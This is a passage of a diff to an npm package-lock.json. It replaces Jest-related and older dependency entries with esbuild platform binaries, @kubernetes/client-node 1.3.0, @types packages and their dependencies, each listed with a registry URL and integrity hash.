} + "optional": true }, - "jest-worker": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.6.1.tgz", - "integrity": "sha512-U+Wrbca7S8ZAxAe9L6nb6g8kPdia5hj32Puu5iOqBCMTMWFHXuK6dOV2IFrpedbTV8fjMFLdWNttQTBL6u2MRA==", + "@esbuild/darwin-x64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/darwin-x64/-/darwin-x64-0.25.5.tgz", + "integrity": "sha512-1iT4FVL0dJ76/q1wd7XDsXrSW+oLoquptvh4CLR4kITDtqi2e/xwXwdCVH8hVHU43wgJdsq7Gxuzcs6Iq/7bxQ==", "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.6.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "dependencies": { - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - } - } + "optional": true }, - "jose": { - "version": "4.15.5", - "resolved": "https://registry.npmjs.org/jose/-/jose-4.15.5.tgz", - "integrity": "sha512-jc7BFxgKPKi94uOvEmzlSWFFe2+vASyXaKUpdQKatWAESU2MWjDfFf0fdfc83CDKcA5QecabZeNLyfhe3yKNkg==", + "@esbuild/freebsd-arm64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/freebsd-arm64/-/freebsd-arm64-0.25.5.tgz", + "integrity": "sha512-nk4tGP3JThz4La38Uy/gzyXtpkPW8zSAmoUhK9xKKXdBCzKODMc2adkB2+8om9BDYugz+uGV7sLmpTYzvmz6Sw==", + "dev": true, "optional": true }, - "js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true + "@esbuild/freebsd-x64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/freebsd-x64/-/freebsd-x64-0.25.5.tgz", + "integrity": "sha512-PrikaNjiXdR2laW6OIjlbeuCPrPaAl0IwPIaRv+SMV8CiM8i2LqVUHFC1+8eORgWyY7yhQY+2U2fA55mBzReaw==", + "dev": true, + "optional": true }, - "js-yaml": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", - "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", - "requires": { - "argparse": "^2.0.1" - } + "@esbuild/linux-arm": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-arm/-/linux-arm-0.25.5.tgz", + "integrity": "sha512-cPzojwW2okgh7ZlRpcBEtsX7WBuqbLrNXqLU89GxWbNt6uIg78ET82qifUy3W6OVww6ZWobWub5oqZOVtwolfw==", + "dev": true, + "optional": true }, - "jsbn": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-1.1.0.tgz", - "integrity": "sha512-4bYVV3aAMtDTTu4+xsDYa6sy9GyJ69/amsu9sYF2zqjiEoZA5xJi3BrfX3uY+/IekIu7MwdObdbDWpoZdBv3/A==" + "@esbuild/linux-arm64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-arm64/-/linux-arm64-0.25.5.tgz", + "integrity": "sha512-Z9kfb1v6ZlGbWj8EJk9T6czVEjjq2ntSYLY2cw6pAZl4oKtfgQuS4HOq41M/BcoLPzrUbNd+R4BXFyH//nHxVg==", + "dev": true, + "optional": true }, - "jsesc": { - "version": "2.5.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", - "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", - "dev": true + "@esbuild/linux-ia32": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-ia32/-/linux-ia32-0.25.5.tgz", + "integrity": "sha512-sQ7l00M8bSv36GLV95BVAdhJ2QsIbCuCjh/uYrWiMQSUuV+LpXwIqhgJDcvMTj+VsQmqAHL2yYaasENvJ7CDKA==", + "dev": true, + "optional": true }, - "json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true + "@esbuild/linux-loong64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-loong64/-/linux-loong64-0.25.5.tgz", + "integrity": "sha512-0ur7ae16hDUC4OL5iEnDb0tZHDxYmuQyhKhsPBV8f99f6Z9KQM02g33f93rNH5A30agMS46u2HP6qTdEt6Q1kg==", + "dev": true, + "optional": true }, - "json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" + "@esbuild/linux-mips64el": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-mips64el/-/linux-mips64el-0.25.5.tgz", + "integrity": "sha512-kB/66P1OsHO5zLz0i6X0RxlQ+3cu0mkxS3TKFvkb5lin6uwZ/ttOkP3Z8lfR9mJOBk14ZwZ9182SIIWFGNmqmg==", + "dev": true, + "optional": true }, - "json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" + "@esbuild/linux-ppc64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-ppc64/-/linux-ppc64-0.25.5.tgz", + "integrity": "sha512-UZCmJ7r9X2fe2D6jBmkLBMQetXPXIsZjQJCjgwpVDz+YMcS6oFR27alkgGv3Oqkv07bxdvw7fyB71/olceJhkQ==", + "dev": true, + "optional": true }, - "json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" + "@esbuild/linux-riscv64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-riscv64/-/linux-riscv64-0.25.5.tgz", + "integrity": "sha512-kTxwu4mLyeOlsVIFPfQo+fQJAV9mh24xL+y+Bm6ej067sYANjyEw1dNHmvoqxJUCMnkBdKpvOn0Ahql6+4VyeA==", + "dev": true, + "optional": true }, - "json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true + "@esbuild/linux-s390x": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-s390x/-/linux-s390x-0.25.5.tgz", + "integrity": "sha512-K2dSKTKfmdh78uJ3NcWFiqyRrimfdinS5ErLSn3vluHNeHVnBAFWC8a4X5N+7FgVE1EjXS1QDZbpqZBjfrqMTQ==", + "dev": true, + "optional": true }, - "jsonpath-plus": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-7.2.0.tgz", - "integrity": "sha512-zBfiUPM5nD0YZSBT/o/fbCUlCcepMIdP0CJZxM1+KgA4f2T206f6VAg9e7mX35+KlMaIc5qXW34f3BnwJ3w+RA==" - }, - "jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", - "requires": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" - } + "@esbuild/linux-x64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/linux-x64/-/linux-x64-0.25.5.tgz", + "integrity": "sha512-uhj8N2obKTE6pSZ+aMUbqq+1nXxNjZIIjCjGLfsWvVpy7gKCOL6rsY1MhRh9zLtUtAI7vpgLMK6DxjO8Qm9lJw==", + "dev": true, + "optional": true }, - "kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true + "@esbuild/netbsd-arm64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/netbsd-arm64/-/netbsd-arm64-0.25.5.tgz", + "integrity": "sha512-pwHtMP9viAy1oHPvgxtOv+OkduK5ugofNTVDilIzBLpoWAM16r7b/mxBvfpuQDpRQFMfuVr5aLcn4yveGvBZvw==", + "dev": true, + "optional": true }, - "leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true + "@esbuild/netbsd-x64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/netbsd-x64/-/netbsd-x64-0.25.5.tgz", + "integrity": "sha512-WOb5fKrvVTRMfWFNCroYWWklbnXH0Q5rZppjq0vQIdlsQKuw6mdSihwSo4RV/YdQ5UCKKvBy7/0ZZYLBZKIbwQ==", + "dev": true, + "optional": true }, - "lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true + "@esbuild/openbsd-arm64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/openbsd-arm64/-/openbsd-arm64-0.25.5.tgz", + "integrity": "sha512-7A208+uQKgTxHd0G0uqZO8UjK2R0DDb4fDmERtARjSHWxqMTye4Erz4zZafx7Di9Cv+lNHYuncAkiGFySoD+Mw==", + "dev": true, + "optional": true }, - "locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", + "@esbuild/openbsd-x64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/openbsd-x64/-/openbsd-x64-0.25.5.tgz", + "integrity": "sha512-G4hE405ErTWraiZ8UiSoesH8DaCsMm0Cay4fsFWOOUcz8b8rC6uCvnagr+gnioEjWn0wC+o1/TAHt+It+MpIMg==", "dev": true, - "requires": { - "p-locate": "^4.1.0" - } + "optional": true }, - "lodash": { - "version": "4.17.21", - "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", - "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==" + "@esbuild/sunos-x64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/sunos-x64/-/sunos-x64-0.25.5.tgz", + "integrity": "sha512-l+azKShMy7FxzY0Rj4RCt5VD/q8mG/e+mDivgspo+yL8zW7qEwctQ6YqKX34DTEleFAvCIUviCFX1SDZRSyMQA==", + "dev": true, + "optional": true }, - "lodash.memoize": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/lodash.memoize/-/lodash.memoize-4.1.2.tgz", - "integrity": "sha512-t7j+NzmgnQzTAYXcsHYLgimltOV1MXHtlOWf6GjL9Kj8GK5FInw5JotxvbOs+IvV1/Dzo04/fCGfLVs7aXb4Ag==", - "dev": true + "@esbuild/win32-arm64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/win32-arm64/-/win32-arm64-0.25.5.tgz", + "integrity": "sha512-O2S7SNZzdcFG7eFKgvwUEZ2VG9D/sn/eIiz8XRZ1Q/DO5a3s76Xv0mdBzVM5j5R639lXQmPmSo0iRpHqUUrsxw==", + "dev": true, + "optional": true }, - "lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", + "@esbuild/win32-ia32": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/win32-ia32/-/win32-ia32-0.25.5.tgz", + "integrity": "sha512-onOJ02pqs9h1iMJ1PQphR+VZv8qBMQ77Klcsqv9CNW2w6yLqoURLcgERAIurY6QE63bbLuqgP9ATqajFLK5AMQ==", "dev": true, - "requires": { - "yallist": "^3.0.2" - } + "optional": true }, - "make-dir": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", - "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", + "@esbuild/win32-x64": { + "version": "0.25.5", + "resolved": "https://registry.npmjs.org/@esbuild/win32-x64/-/win32-x64-0.25.5.tgz", + "integrity": "sha512-TXv6YnJ8ZMVdX+SXWVBo/0p8LTcrUYngpWjvm91TMjjBQii7Oz11Lw5lbDV5Y0TzuhSJHwiH4hEtC1I42mMS0g==", "dev": true, - "requires": { - "semver": "^6.0.0" - } + "optional": true }, - "make-error": { - "version": "1.3.6", - "resolved": "https://registry.npmjs.org/make-error/-/make-error-1.3.6.tgz", - "integrity": "sha512-s8UhlNe7vPKomQhC1qFelMokr/Sc3AgNbso3n74mVPA5LTZwkB9NlXf4XPamLxJE8h0gh73rM94xvwRT2CVInw==", - "dev": true + "@jsep-plugin/assignment": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/@jsep-plugin/assignment/-/assignment-1.3.0.tgz", + "integrity": "sha512-VVgV+CXrhbMI3aSusQyclHkenWSAm95WaiKrMxRFam3JSUiIaQjoMIw2sEs/OX4XifnqeQUN4DYbJjlA8EfktQ==", + "requires": {} }, - "makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "requires": { - "tmpl": "1.0.5" - } + "@jsep-plugin/regex": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/@jsep-plugin/regex/-/regex-1.0.4.tgz", + "integrity": "sha512-q7qL4Mgjs1vByCaTnDFcBnV9HS7GVPJX5vyVoCgZHNSC9rjwIlmbXG5sUuorR5ndfHAIlJ8pVStxvjXHbNvtUg==", + "requires": {} }, - "matcher": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/matcher/-/matcher-4.0.0.tgz", - "integrity": "sha512-S6x5wmcDmsDRRU/c2dkccDwQPXoFczc5+HpQ2lON8pnvHlnvHAHj5WlLVvw6n6vNyHuVugYrFohYxbS+pvFpKQ==", + "@kubernetes/client-node": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-1.3.0.tgz", + "integrity": "sha512-IE0yrIpOT97YS5fg2QpzmPzm8Wmcdf4ueWMn+FiJSI3jgTTQT1u+LUhoYpdfhdHAVxdrNsaBg2C0UXSnOgMoCQ==", "requires": { - "escape-string-regexp": "^4.0.0" + "@types/js-yaml": "^4.0.1", + "@types/node": "^22.0.0", + "@types/node-fetch": "^2.6.9", + "@types/stream-buffers": "^3.0.3", + "form-data": "^4.0.0", + "hpagent": "^1.2.0", + "isomorphic-ws": "^5.0.0", + "js-yaml": "^4.1.0", + "jsonpath-plus": "^10.3.0", + "node-fetch": "^2.6.9", + "openid-client": "^6.1.3", + "rfc4648": "^1.3.0", + "socks-proxy-agent": "^8.0.4", + "stream-buffers": "^3.0.2", + "tar-fs": "^3.0.8", + "ws": "^8.18.2" } }, - "merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "micromatch": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", - "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", + "@types/ip-address": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/@types/ip-address/-/ip-address-7.0.0.tgz", + "integrity": "sha512-OyDm4EwZsYPDUjXz3ktiuQE8PJIPO1uUZMfvZMcWmykWjm3WVyI78rAnHkqKV3pMR7iDRKfalI+RxG5JBDUo5w==", "dev": true, "requires": { - "braces": "^3.0.2", - "picomatch": "^2.3.1" + "ip-address": "*" } }, - "mime-db": { - "version": "1.52.0", - "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", - "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==" - }, - "mime-types": { - "version": "2.1.35", - "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", - "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", - "requires": { - "mime-db": "1.52.0" - } + "@types/js-yaml": { + "version": "4.0.5", + "resolved": "https://registry.npmjs.org/@types/js-yaml/-/js-yaml-4.0.5.tgz", + "integrity": "sha512-FhpRzf927MNQdRZP0J5DLIdTXhjLYzeUTmLAu69mnVksLH9CJY3IuSeEgbKUki7GQZm0WqDkGzyxju2EZGD2wA==" }, - "mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", + "@types/lodash": { + "version": "4.14.195", + "resolved": "https://registry.npmjs.org/@types/lodash/-/lodash-4.14.195.tgz", + "integrity": "sha512-Hwx9EUgdwf2GLarOjQp5ZH8ZmblzcbTBC2wtQWNKARBSxM9ezRIAUpeDTgoQRAFB0+8CNWXVA9+MaSOzOF3nPg==", "dev": true }, - "minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "requires": { - "brace-expansion": "^1.1.7" - } + "@types/matcher": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/@types/matcher/-/matcher-1.1.0.tgz", + "integrity": "sha512-ABJ5kIpPHprtDTLh3xoB7QoGsqhGa9oUvLRiSBe/Sj0fPrxSpZezkussmjiR+QWtjqhrmfyV9vs6BpPPfygDUQ==", + "dev": true }, - "minipass": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-5.0.0.tgz", - "integrity": "sha512-3FnjYuehv9k6ovOEbyOswadCDPX1piCfhV8ncmYtHOjuPwylVWsghTLo7rabjC3Rx5xD4HDx8Wm1xnMF7S5qFQ==" + "@types/mustache": { + "version": "4.2.6", + "resolved": "https://registry.npmjs.org/@types/mustache/-/mustache-4.2.6.tgz", + "integrity": "sha512-t+8/QWTAhOFlrF1IVZqKnMRJi84EgkIK5Kh0p2JV4OLywUvCwJPFxbJAl7XAow7DVIHsF+xW9f1MVzg0L6Szjw==", + "dev": true }, - "minizlib": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-2.1.2.tgz", - "integrity": "sha512-bAxsR8BVfj60DWXHE3u30oHzfl4G7khkSuPW+qvpd7jFRHm7dLxOjUk1EHACJ/hxLY8phGJ0YhYHZo7jil7Qdg==", + "@types/node": { + "version": "22.16.0", + "resolved": "https://registry.npmjs.org/@types/node/-/node-22.16.0.tgz", + "integrity": "sha512-B2egV9wALML1JCpv3VQoQ+yesQKAmNMBIAY7OteVrikcOcAkWm+dGL6qpeCktPjAv6N1JLnhbNiqS35UpFyBsQ==", "requires": { - "minipass": "^3.0.0", - "yallist": "^4.0.0" + "undici-types": "~6.21.0" }, "dependencies": { - "minipass": { - "version": "3.3.6", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-3.3.6.tgz", - "integrity": "sha512-DxiNidxSEK+tHG6zOIklvNOwm3hvCrbUrdtzY74U6HKTJxvIDfOUL5W5P2Ghd3DTkhhKPYGqeNUIh5qcM4YBfw==", - "requires": { - "yallist": "^4.0.0" - } - }, - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + "undici-types": { + "version": "6.21.0", + "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.21.0.tgz", + "integrity": "sha512-iwDZqg0QAGrg9Rav5H4n0M64c3mkR59cJ6wQp+7C4nI0gsmExaedaYLNO44eT4AtBBwjbTiGPMlt2Md0T9H9JQ==" } } }, - "mkdirp": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-1.0.4.tgz", - "integrity": "sha512-vVqVZQyf3WLx2Shd0qJ9xuvqgAyKPLAiqITEtqW0oIUjzo3PePDd6fW9iFz30ef7Ysp/oiWqbhszeGWW2T6Gzw==" - }, - "ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "mustache": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/mustache/-/mustache-4.2.0.tgz", - "integrity": "sha512-71ippSywq5Yb7/tVYyGbkBggbU8H3u5Rz56fH60jGFgr8uHwxs+aSKeqmluIVzM0m0kB7xQjKS6qPfd0b2ZoqQ==" - }, - "natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node-fetch": { + "@types/node-fetch": { "version": "2.6.12", - "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.6.12.tgz", - "integrity": "sha512-C/fGU2E8ToujUivIO0H+tpQ6HWo4eEmchoPIoXtxCrVghxdKq+QOHqEZW7tuP3KlV3bC8FRMO5nMCC7Zm1VP6g==", + "resolved": "https://registry.npmjs.org/@types/node-fetch/-/node-fetch-2.6.12.tgz", + "integrity": "sha512-8nneRWKCg3rMtF69nLQJnOYUcbafYeFSjqkw3jCRLsqkWFlHaoQrr5mXmofFGOx3DKn7UfmBMyov8ySvLRVldA==", "requires": { - "whatwg-url": "^5.0.0" + "@types/node": "*", + "form-data": "^4.0.0" } }, - "node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node-releases": { - "version": "2.0.13", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.13.tgz", - "integrity": "sha512-uYr7J37ae/ORWdZeQ1xxMJe3NtdmqMC/JZK+geofDrkLUApKRHPd18/TxtBOJ4A0/+uUIliorNrfYV6s1b02eQ==", - "dev": true - }, - "normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true - }, - "npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, + "@types/stream-buffers": { + "version": "3.0.7", + "resolved": "https://registry.npmjs.org/@types/stream-buffers/-/stream-buffers-3.0.7.tgz", + "integrity": "sha512-azOCy05sXVXrO+qklf0c/B07H/oHaIuDDAiHPVwlk3A9Ek+ksHyTeMajLZl3r76FxpPpxem//4Te61G1iW3Giw==", "requires": { - "path-key": "^3.0.0" + "@types/node": "*" } }, - "oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==" + "agent-base": { + "version": "7.1.3", + "resolved": "https://registry.npmjs.org/agent-base/-/agent-base-7.1.3.tgz", + "integrity": "sha512-jRR5wdylq8CkOe6hei19GGZnxM6rBGwFl3Bg0YItGDimvjGtAvdZk4Pu6Cl4u4Igsws4a1fd1Vq3ezrhn4KmFw==" }, - "object-hash": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/object-hash/-/object-hash-2.2.0.tgz", - "integrity": "sha512-gScRMn0bS5fH+IuwyIFgnh9zBdo4DV+6GhygmWM9HyNJSgS0hScp1f5vjtm7oIIOiT9trXrShAkLFSc2IqKNgw==", - "optional": true + "argparse": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", + "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" }, - "oidc-token-hash": { - "version": "5.0.3", - "resolved": "https://registry.npmjs.org/oidc-token-hash/-/oidc-token-hash-5.0.3.tgz", - "integrity": "sha512-IF4PcGgzAr6XXSff26Sk/+P4KZFJVuHAJZj3wgO3vX2bMdNVp/QXTP3P7CEm9V1IdG8lDLY3HhiqpsE/nOwpPw==", - "optional": true + "asynckit": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", + "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" }, - "once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dev": true, - "requires": { - "wrappy": "1" - } + "b4a": { + "version": "1.6.7", + "resolved": "https://registry.npmjs.org/b4a/-/b4a-1.6.7.tgz", + "integrity": "sha512-OnAYlL5b7LEkALw87fUVafQw5rVR9RjwGd4KUwNQ6DrrNmaVaUCgLipfVlzrPQ4tWOR9P0IXGNOx50jYCCdSJg==" }, - "onetime": { - "version": "5.1.2", - "resolved": 